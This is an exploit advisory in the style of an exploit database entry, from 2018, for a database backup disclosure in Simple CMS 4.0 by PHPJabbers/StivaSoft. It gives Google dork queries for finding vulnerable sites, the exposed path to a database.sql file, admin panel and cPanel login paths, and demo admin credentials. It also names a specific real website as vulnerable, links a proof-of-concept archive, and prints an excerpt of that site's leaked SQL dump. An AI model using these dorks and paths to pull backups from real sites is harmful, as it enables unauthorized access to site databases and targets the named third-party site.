#################################################################################################
# Exploit Title : Simple CMS PHPJabbers Stivasoft 4.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : phpjabbers.com ~ stivasoft.com ~ racingriverwebs.com
# Software Download Link : phpjabbers.com/simple-cms/
# Demo Software : demo.phpjabbers.com/1544995520_332/index.php?controller=pjAdminSections&action=pjActionIndex
+ Login Details => Email: admin@admin.com Password: pass
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0
# Exploit Risk : Medium
# Google Dorks : intext:''PHP Scripts Copyright © 2018 StivaSoft Ltd''
+ intext:''Hotel Booking script by PHPJabbers.com -
+ intext:''© Copyright Dravis Interests 2003-2018 Website by Racing River Website Solutions''
+ intext:''Website by Racing River Website Solutions''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/scms4/index.php?controller=Admin&action=login
# CPanel Login Path :
p3plcpnl0800.prod.phx3.secureserver.net:2083
# Exploit :
/scms4/app/config/database.sql
#################################################################################################
# Example SQL Dump Information => dravisinterests.com
DROP TABLE IF EXISTS `simple_cms_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_files` (
DROP TABLE IF EXISTS `simple_cms_roles`;
CREATE TABLE IF NOT EXISTS `simple_cms_roles` (
DROP TABLE IF EXISTS `simple_cms_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_sections` (
DROP TABLE IF EXISTS `simple_cms_users`;
CREATE TABLE IF NOT EXISTS `simple_cms_users` (
DROP TABLE IF EXISTS `simple_cms_users_files`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_files` (
DROP TABLE IF EXISTS `simple_cms_users_sections`;
CREATE TABLE IF NOT EXISTS `simple_cms_users_sections` (
DROP TABLE IF EXISTS `simple_cms_options`;
CREATE TABLE IF NOT EXISTS `simple_cms_options` (
INSERT INTO `simple_cms_roles` (`id`, `role`, `status`) VALUES
(1, 'admin', 'T'),
(2, 'editor', 'T');
#################################################################################################
# Example Vulnerable Site =>
[+] dravisinterests.com/scms4/app/config/database.sql => [ Proof of Concept for Vuln ] => archive.is/43J4N
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
